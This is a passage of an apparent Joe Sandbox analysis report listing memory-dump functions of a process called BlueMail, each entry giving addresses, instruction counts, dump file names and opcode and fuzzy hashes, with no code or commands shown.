Instruction Fuzzy Hash: 5DE08CB45003098BDB24AF38C9147AA37A2EB89220F008784980967280DB341DC18F01

Function 05E8BBB7 Relevance: 1.3, Strings: 1, Instructions: 13COMMON

Download Yara Rule

Strings

8, xrefs: 05E8C3D9

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: af46e4b357d56406b18f2d6b87e5bbad02103ae2921c06c36109eabb2a15308b
Instruction ID: 65c9917d953af1c541bedecd089299102098ea490fda22b18c598c38a929d82a
Opcode Fuzzy Hash: af46e4b357d56406b18f2d6b87e5bbad02103ae2921c06c36109eabb2a15308b
Instruction Fuzzy Hash: 71D0C7B09003088BDB24EF38CA107AE37A2EB89200F00A288840DAB200EB340DC18F01

Function 0604E968 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feb8a0f3c4e7f0e77b3be78802a3be664c214507971cb7ccc4a83b33d46a48a8
Instruction ID: 17b7d9499988a98f08034a01f2e3a16d73098e036ae92a031806f9c52d547281
Opcode Fuzzy Hash: feb8a0f3c4e7f0e77b3be78802a3be664c214507971cb7ccc4a83b33d46a48a8
Instruction Fuzzy Hash: E1120B74A502158FDB64EF64C894B9DBBB2FF89300F5085A8E44AAB355DF30ED86CB50

Function 06041A38 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f791096851ee7698a301b7f58b748eea665ab63e04da8225723503405152626a
Instruction ID: a42e564cc6a3b27b6bfa283eb1bee200a963990f7ed214efe17dc8b7fef511bc
Opcode Fuzzy Hash: f791096851ee7698a301b7f58b748eea665ab63e04da8225723503405152626a
Instruction Fuzzy Hash: 71A1BE75A512149FCB64DFA4D845AADBFF2EF89301F1480BAE8119B350CB35DC82CBA0

Function 0604E958 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d146d6f9e804036a53adb64c7b1b1d8187ff545ceed32149766f618971a7e8b
Instruction ID: 4da2119527c80d2a5cadb7158773b23244c71d6252e3505062cfc59073e90fda
Opcode Fuzzy Hash: 9d146d6f9e804036a53adb64c7b1b1d8187ff545ceed32149766f618971a7e8b
Instruction Fuzzy Hash: 72A10974B402148FDBA4EF64C894B9DBBB2BF89300F5485A8E549AB395DF30AD85CF50

Function 0604F910 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a821a90e3ba16cde82a406d00bd799db8e53f2db15f96a8978d891805f2be3d4
Instruction ID: 73ea8e2bc4045946746fdf411b723b2af1c659d6ae04fdbf70067316816413a8
Opcode Fuzzy Hash: a821a90e3ba16cde82a406d00bd799db8e53f2db15f96a8978d891805f2be3d4
Instruction Fuzzy Hash: 8F813AB4B50215DFDB94EF68D894A6DBBF5EF89600F1440A9E4069B3A5CB30EC42CB91

Function 06047388 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 060752a555e9ffad95f89adbce140af04a2334656c2f0ac8f6a62c059d50a01b
Instruction ID: e0ae8bb4a9faf1f0e209cadcc85870f62b1c5d03d5fc57413f082d6d0aad5ed6
Opcode Fuzzy Hash: 060752a555e9ffad95f89adbce140af04a2334656c2f0ac8f6a62c059d50a01b
Instruction Fuzzy Hash: B4813F75A40218CFDB64EF68C584A9DBBF5FF48350B1584A9E816DB360DB70ED42CB90

Function 0604F900 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86c4128314bc4f77a2e1f42bdde1ebd33b5b0c0cbac5b872fce3a20c5789310b
Instruction ID: 9f432c68fc1e1068739dfb74e7e910db37c131623e9daf5fad337396aeed49aa
Opcode Fuzzy Hash: 86c4128314bc4f77a2e1f42bdde1ebd33b5b0c0cbac5b872fce3a20c5789310b
Instruction Fuzzy Hash: F2612AB4B50215DFCB94EF68D894AADBBF6FF88600F148169E4169B365CB70EC41CB90

Function 0604A658 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a21d58fe4c54493315caefcaa4829968a741c49b5164819a256252f587950ae
Instruction ID: 1d2c63e0ed8d8a8def63c223c63623586537fa81f557d89a17d0dca180bba9d7
Opcode Fuzzy Hash: 9a21d58fe4c54493315caefcaa4829968a741c49b5164819a256252f587950ae
Instruction Fuzzy Hash: D4516F34B10619DFCB04EF64E459AAEBBB6FF88711F008129F5029B364DF749946CB91

Function 06042C3F Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f25d4b3591b845f53b9a1be0a0d49a0e8599d03972359e595cd5336604ecc5d4
Instruction ID: 2654127055a56c203b2393191d1f6ceadf1d0750816d1d8a7d7da5d78168277e
Opcode Fuzzy Hash: f25d4b3591b845f53b9a1be0a0d49a0e8599d03972359e595cd5336604ecc5d4
Instruction Fuzzy Hash: BF513974B512149FEBA4EB24CC90F99BBF1EF49310F1045E5E909AB3A1CA31DE81CB90

Function 0604FC00 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7db8accb34628db55d7ec415e2632305ead04fb0b6cda9047df3d64be04e1b4d
Instruction ID: 819b767b560faaae0cc0ee11cdb0f20c60f34f990285dc31072bad791dce0616
Opcode Fuzzy Hash: 7db8accb34628db55d7ec415e2632305ead04fb0b6cda9047df3d64be04e1b4d
Instruction Fuzzy Hash: F5416C75A401099FCB54EF64D954AEEBBB6FF8C311F148065E902AB391CB359C52CBA0

Function 0604D230 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e25e0f40d4ddb1f8ca6f444ca7e1e2f5ba45830d567bdfa8a2f4f9b66214f845
Instruction ID: a44b44adb4164791d998982640e95f48295bc660a63af21f1ba403713e912b9b
Opcode Fuzzy Hash: e25e0f40d4ddb1f8ca6f444ca7e1e2f5ba45830d567bdfa8a2f4f9b66214f845
Instruction Fuzzy Hash: AE31F576A505049FCB55DF98D988E99BBB2FF48320B0680B8F5099B372CB31ED56DB40

Function 060422E8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3413738c80d1c2c49c086686e7f148a35676d2b018c55b5fa35e8d5d728bba84
Instruction ID: 89e5c16ab5d98a16a11085b7139fca6eab18629e2a60539ae55322bd6bb884df
Opcode Fuzzy Hash: 3413738c80d1c2c49c086686e7f148a35676d2b018c55b5fa35e8d5d728bba84
Instruction Fuzzy Hash: 73416AB1B502198FDBA4DF65C9447AEBBF1FB84301F00807AE505E7294DB74DA85CB91

Function 05E8FC50 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de3bb66f36395be0d7cd5175b1ee5847652abe9a6da130d26b43a24db8e118ca
Instruction ID: 44a7e59c1c64a02c3d4bf6d99b9e197f4bd1b393638afdee7086c5ca010edae1
Opcode Fuzzy Hash: de3bb66f36395be0d7cd5175b1ee5847652abe9a6da130d26b43a24db8e118ca
Instruction Fuzzy Hash: 28411774E14608DFEB04DFAAD5446EEBBF6FB8C304F109065D829A7344D7385A418F94

Function 06042CA0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b7e17eeee2c6caaa1539a3dc11ef76be15256d63bf754c4d480505cf51db6a4
Instruction ID: b3ea51bea78493a131ccaf615ad59d2f1525c510f23864224dc4d0c5a3473f5a
Opcode Fuzzy Hash: 9b7e17eeee2c6caaa1539a3dc11ef76be15256d63bf754c4d480505cf51db6a4
Instruction Fuzzy Hash: 4C41E674B512248FEBA4EF64CD91FA9B7B1BF59210F1101E5E909AB3A1CA30DE81CF50

Function 06046EA8 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3e5e710be618f9f4c430ab582de8bc586eda98ca736373314fa7c15defde87f
Instruction ID: 91b989d657deb4cbd04705eeb461f977fd0da7585950c07a8607b67504168a3e
Opcode Fuzzy Hash: e3e5e710be618f9f4c430ab582de8bc586eda98ca736373314fa7c15defde87f
Instruction Fuzzy Hash: C1318D716502059FDB64DF29D884AAA7BE2FF89304F148179F805CB2A1DB75EC92CB90

Function 0604B3F8 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca1c7245ddb7a54a27e54765c237cd05517b8961c2c0bbfe78ac7debd87ccb3b
Instruction ID: 69f97029da01616a0eabb709dba6bab8eee4d125996e9f0a8e19fc4cc9a004a0
Opcode Fuzzy Hash: ca1c7245ddb7a54a27e54765c237cd05517b8961c2c0bbfe78ac7debd87ccb3b
Instruction Fuzzy Hash: 6D2126327402108FD7B4AAB9E484B6ABBE5EFC43A1F09857AE10DCB651DB31EC42C750

Function 05A63629 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cbc3ba690bfe8d4d77b1f7e87ba1f77f228c4f78dabea84f165aaefb9f7a72d
Instruction ID: a120f6564d180f343e8e3429063a81474c10caedd1269f7e29d40cb66a6d84d8
Opcode Fuzzy Hash: 6cbc3ba690bfe8d4d77b1f7e87ba1f77f228c4f78dabea84f165aaefb9f7a72d
Instruction Fuzzy Hash: 88311678D04209CFDB04DFA9D544BAEBBB2FB8C301F10882AD526B7344DB7509568BA1

Function 0604CE40 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edbb54fa121a8cee913ac314d98310ca55f3005e62b5a4d31547ed905b6f4d39
Instruction ID: 7c5ca10c78a2148ba61f3d48709e31af6d877d92336f4c75ea1a09be2966d2e6
Opcode Fuzzy Hash: edbb54fa121a8cee913ac314d98310ca55f3005e62b5a4d31547ed905b6f4d39
Instruction Fuzzy Hash: 1E21C5717462504FEBA5AF368854A7A3FE9AF85551708407AF442CB3A1DB38DC40C760

Function 06047328 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55f7475d14a87c9f08efa4aebb86689f186693d15178d921c2b2e0ee008babb4
Instruction ID: 6b97686e10f9f8ae15ce8d827c68ab196639bb2de831771ec27dd7bdff945cef
Opcode Fuzzy Hash: 55f7475d14a87c9f08efa4aebb86689f186693d15178d921c2b2e0ee008babb4
Instruction Fuzzy Hash: 4621A4B6A0425C9FDB15DFA4D8808CEBFF9EF49210F154066E505EB352DA30E946CBA1

Function 06044770 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acb1292ff7ffe556564b845d5382cad8011636fa82166e5a34a7b34d9c590240
Instruction ID: 634bcae506f75132a035343def855c42387f3aa8baf021f3766cfea1fd754295
Opcode Fuzzy Hash: acb1292ff7ffe556564b845d5382cad8011636fa82166e5a34a7b34d9c590240
Instruction Fuzzy Hash: C72166B1E402489FEBA0EEA8C404BAEBBE4EB04340F10807AD905DB290E674CA51CB90

Function 0604D220 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f94bfcf2a8077cad8a52f6295c1137ca78dc3a25f9b009ae022295ebb775b62
Instruction ID: 0ddf7bb47bcda321d8eb103d3e73a9b5814c23b99e400768fd7a830653c02a48
Opcode Fuzzy Hash: 4f94bfcf2a8077cad8a52f6295c1137ca78dc3a25f9b009ae022295ebb775b62
Instruction Fuzzy Hash: 20216836A00104AFCB45DFA8D988D99BBB2FF4C310B0640A9E5099B372C731EC55DB50

Function 0316D01C Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2270400136.000000000316D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0316D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_316d000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3e0dd644cedfd5a1e64b69ef108880302642d5356cd359bab00afbe25402bc3
Instruction ID: 620de2bb76165c404d8ed97117d0e356da746abd0aa9034b369a357868bc8a03
Opcode Fuzzy Hash: f3e0dd644cedfd5a1e64b69ef108880302642d5356cd359bab00afbe25402bc3
Instruction Fuzzy Hash: 3E210776604644DFDB14DF54E9C4B26BB65FB88314F24C5A9E9090B242C336D467CBA2

Function 06040AB1 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3da0e0e2ab54b6b781dadf78bb00f381edbf8e52f0a1aa95cde8d4d886de5d62
Instruction ID: 395c8ee23641f9b9e7b39986f2bf87d6608277aa40579b4ef481cfeeef92f8c2
Opcode Fuzzy Hash: 3da0e0e2ab54b6b781dadf78bb00f381edbf8e52f0a1aa95cde8d4d886de5d62
Instruction Fuzzy Hash: 3D214C35A10218AFDF159FA8C8449DE7FB6EF8C324F148129E511B7390DF759882CB94

Function 06047341 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6798134f03eb2ed3b506996a31ba3054d098badee67fe9b8f786cfcc6eb2e1ab
Instruction ID: 5d210203db4f1183a95ec5481f0e6c905468b18172ef5431312f288b86916005
Opcode Fuzzy Hash: 6798134f03eb2ed3b506996a31ba3054d098badee67fe9b8f786cfcc6eb2e1ab
Instruction Fuzzy Hash: C6216F76A0421C9FDB19DF98D88099EBBF9EF89200F014466E545EB350DA30ED06CBA1

Function 05A6B658 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 155934f229f271ff5255fe60a7911ef87c4c7c89ca4d51dab929bc618df510de
Instruction ID: b8ae1d068228a0842c76bcf27d91c330aa61e9e7fba0d7dabcb4249f0a155118
Opcode Fuzzy Hash: 155934f229f271ff5255fe60a7911ef87c4c7c89ca4d51dab929bc618df510de
Instruction Fuzzy Hash: F42134B8D05209CFDB14DFAAD548AEEBBB6FB89301F10802AD455F7281D7750A85CFA1

Function 06041470 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a9f17e544a07e07a3de678b43506ac6005f5bb290710ef20c57e0905c36fee4
Instruction ID: df57dd8cf8b880a077c8d7e75d155d50463293d72eff90226f583ec64e1664d7
Opcode Fuzzy Hash: 0a9f17e544a07e07a3de678b43506ac6005f5bb290710ef20c57e0905c36fee4
Instruction Fuzzy Hash: 311108763443908FD3018B69EC84DEABFB5EF9972570640ABF851CB362D635C806CB50

Function 06048890 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d150fe94e52235cbac8beb9a396712cdc620e50e161e08a8f8037c6670efec9
Instruction ID: 697b8ef59e91849e6547defb300594c486a44710201b13b4c87071a983767036
Opcode Fuzzy Hash: 5d150fe94e52235cbac8beb9a396712cdc620e50e161e08a8f8037c6670efec9
Instruction Fuzzy Hash: 8021F775A402198FDB55DF94C584ADDBBF2FB88300F1045A5E405BB2A1DB72AD41CBA1

Function 05A6B668 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b565e1c778d63654589739fed081a4a8f3ef02fd96b37c5ee9c79630369bf26
Instruction ID: 52ed39e1ae17e6cfe3c12882e96b2d2a6cbeb4731b2dfdbcb26a30d5cbde37b5
Opcode Fuzzy Hash: 1b565e1c778d63654589739fed081a4a8f3ef02fd96b37c5ee9c79630369bf26
Instruction Fuzzy Hash: CE213778D0520DDFDB04DFA9D548AEEBBB6EB89315F10802AD455F3281D7750A84CBA1

Function 05E88208 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5af8d0695cc8f8e559f18a494db83e711ace5c44b5398d20649a04e7ce54d13e
Instruction ID: b6a50c1b5067f8915fe74ab9dd491b6d744d9213e003efa07b87e74a41d24a60
Opcode Fuzzy Hash: 5af8d0695cc8f8e559f18a494db83e711ace5c44b5398d20649a04e7ce54d13e
Instruction Fuzzy Hash: B92127B0E08609DFDB04EFA9C1446BEBBB6FB49304F50A9A9C849A7344D7349981CF91

Function 06048880 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36afd65668472ed5ff6c7224013f55eded2e3e8252ad26828ddb48b13cf3c36e
Instruction ID: 129c3ba4cd4ab3d7e45158239edaa0ac26a43ec54a28c623d7b7a8cb5e481813
Opcode Fuzzy Hash: 36afd65668472ed5ff6c7224013f55eded2e3e8252ad26828ddb48b13cf3c36e
Instruction Fuzzy Hash: AF2126B5A402198FDB55DF64C580BDD7BF2AF48300F2045A4E445BB2A1DB769E82CBA0

Function 06049980 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc72f9cea9380c03f41df9b29af42d745a803b7963febbc464431bda5f0a58dd
Instruction ID: b35776eab8ead99519a4b3db2d3e3eecab6952ade7cb915dcd66b0c061aea112
Opcode Fuzzy Hash: fc72f9cea9380c03f41df9b29af42d745a803b7963febbc464431bda5f0a58dd
Instruction Fuzzy Hash: 9A21B8B1900616EFCB24EF58C880AAAFBB5FF84308F118539D4059B205D335B8A2CBD4

Function 06040448 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdcf8b329d40b23e3c9d8e88952ecab9d8ed272fe048fb45c83c09472fe7c25e
Instruction ID: 4a205fef4b1b18e11668964c8d9528b44977a46f105eeac7025cb2a7ad33d203
Opcode Fuzzy Hash: cdcf8b329d40b23e3c9d8e88952ecab9d8ed272fe048fb45c83c09472fe7c25e
Instruction Fuzzy Hash: 1A21A2346203159FDB14EB78D8457AEBBE6EB89300F408538E01ADB684DFB55D468BE1

Function 0316D006 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2270400136.000000000316D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0316D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_316d000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3053d9608f98ef01b227f5bca5c13f82f6008d9535d32232ee255dda39919a53
Instruction ID: ff0a9a2de8fcbe31cac2603397c309bdd90f43667a1e4f7f556c43bf2e20e280
Opcode Fuzzy Hash: 3053d9608f98ef01b227f5bca5c13f82f6008d9535d32232ee255dda39919a53
Instruction Fuzzy Hash: 6921B076509380CFCB12CF20D994B15BF71EB8A314F2881DAD8448F663C33AD41ACB62

Function 0604F531 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c10105eb2aabec06ed9ca42ebedd2d621e53f3ec20a6245568f35cc80a2846c1
Instruction ID: d0073d08c1e86d46f23399d8f00fbaa0f5d0ad57786af63333b2e8978bf7d92b
Opcode Fuzzy Hash: c10105eb2aabec06ed9ca42ebedd2d621e53f3ec20a6245568f35cc80a2846c1
Instruction Fuzzy Hash: 5F21CD75B006058FCB64EF24D884AABBBF6EF88300F148579E51297360DB70ED05CBA1

Function 05A649D0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa8f38691cc3c3f37f2500a08802f76c84fcb9ac803fc67ffe313a6e136e5143
Instruction ID: cbc3be18997645dcb7c67ec4f0af854339471e2a0d090aac98e3d083441b170e
Opcode Fuzzy Hash: fa8f38691cc3c3f37f2500a08802f76c84fcb9ac803fc67ffe313a6e136e5143
Instruction Fuzzy Hash: 3C2147B5D042099FDF18CF99E885AEEBBF6FB9C311F04812AD515B3204D7340A85CBA4

Function 05A649E0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25d973138eb997ececcab3a19b49686ed4265358b4eb2de3b07eb0e51dc2acce
Instruction ID: d2e290656421fc0aea1411885ff773b01f474ffbd66b53095123a48e4e662511
Opcode Fuzzy Hash: 25d973138eb997ececcab3a19b49686ed4265358b4eb2de3b07eb0e51dc2acce
Instruction Fuzzy Hash: D01114B4D042199FCF08CF99E484AEEBBFAFB9C311F00902AD515B3204D7701985CBA4

Function 0617019A Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2330084819.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6170000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82eed85eec06ea739f8a8642eae1689317d9aa74a395e8336d6300fcc473b897
Instruction ID: 784e44043f211f362a5095bf7ff880e575bf5a09fc10d931c35b0588ad731601
Opcode Fuzzy Hash: 82eed85eec06ea739f8a8642eae1689317d9aa74a395e8336d6300fcc473b897
Instruction Fuzzy Hash: 1531A5B8A05228CFDB64CF28C984A99BBF1FB49300F1085D6E95CA7351DB349E808F55

Function 060415E1 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

